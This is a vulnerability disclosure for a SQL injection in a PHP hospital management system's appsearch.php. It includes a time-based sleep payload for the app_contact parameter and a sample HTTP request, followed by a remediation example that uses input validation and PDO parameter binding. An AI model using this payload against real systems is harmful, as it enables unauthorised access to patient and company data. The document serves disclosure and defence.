SQL Injection vulnerability in kishan0725 Hospital Management System through commit 4770d740f2512693ef8fd9aa10a8d17f79fad9bd (March 21, 2021)
allows attackers to execute SQL commands via the app_contact parameter of /appsearch.php.

How to exploit

URL: <http://localhost/Hospital-Management-System/appsearch.php>
Parameter: app_contact
Payload: '%2b(select*from(select(sleep(20)))a)%2b'

HTTP Request:

POST /Hospital/appsearch.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
Origin: <>
Connection: close
Referer: <>
Cookie: PHPSESSID=rllrv34sf52l6ff6p36ahq7eki
Upgrade-Insecure-Requests: 1


The server will sleep for 20 seconds.

Impact for this vulnerability:

Exposes Sensitive Company Data: Using SQL injection, attackers can retrieve and alter data, which risks exposing sensitive company data stored on the SQL server.

Compromise Users' Privacy: Depending on the data stored on the SQL server, an attack can expose private user data, such as credit card numbers.

How to fix this vulnerability:
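
One way to fix it, shown as an added example that is not the project's own code: validate app_contact and bind it as a query parameter instead of building the SQL string from it. The table and column names, the phone-number format and the in-memory SQLite database used for the demo are assumptions; the same PDO calls work with a MySQL DSN.

```php
<?php
declare(strict_types=1);

// Hypothetical lookup: the table "appointments" and its columns are
// constructed for this example, not taken from the project.
function find_appointments(PDO $db, string $contact): array
{
    // Layer 1, allowlist validation (assumes app_contact is a phone
    // number): anything that is not 7-15 digits is rejected outright.
    if (preg_match('/\A[0-9]{7,15}\z/', $contact) !== 1) {
        throw new InvalidArgumentException('invalid contact number');
    }
    // Layer 2, parameter binding: the value is sent as data, never as
    // SQL text, so quotes or sub-selects in it cannot alter the query.
    $stmt = $db->prepare(
        'SELECT id, patient, contact FROM appointments WHERE contact = :contact'
    );
    $stmt->execute([':contact' => $contact]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed demo data in an in-memory SQLite database (runs offline).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// With a MySQL DSN, also turn off emulated prepares so that binding
// is done by the server:
// $db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
$db->exec('CREATE TABLE appointments (id INTEGER PRIMARY KEY, patient TEXT, contact TEXT)');
$db->exec("INSERT INTO appointments (patient, contact)
           VALUES ('Alice', '9876543210'), ('Bob', '9123456780')");

$inputs = [
    '9876543210',                             // stored number
    '5550001111',                             // well-formed, not stored
    "'+(select*from(select(sleep(20)))a)+'",  // the payload above, URL-decoded
];
foreach ($inputs as $input) {
    try {
        $rows = find_appointments($db, $input);
        printf("%s => %d row(s)\n", $input, count($rows));
    } catch (InvalidArgumentException $e) {
        printf("%s => rejected: %s\n", $input, $e->getMessage());
    }
}
```

Validation alone is not the fix: the bound parameter is what keeps input out of the SQL text, and it should be applied to every query that takes request data.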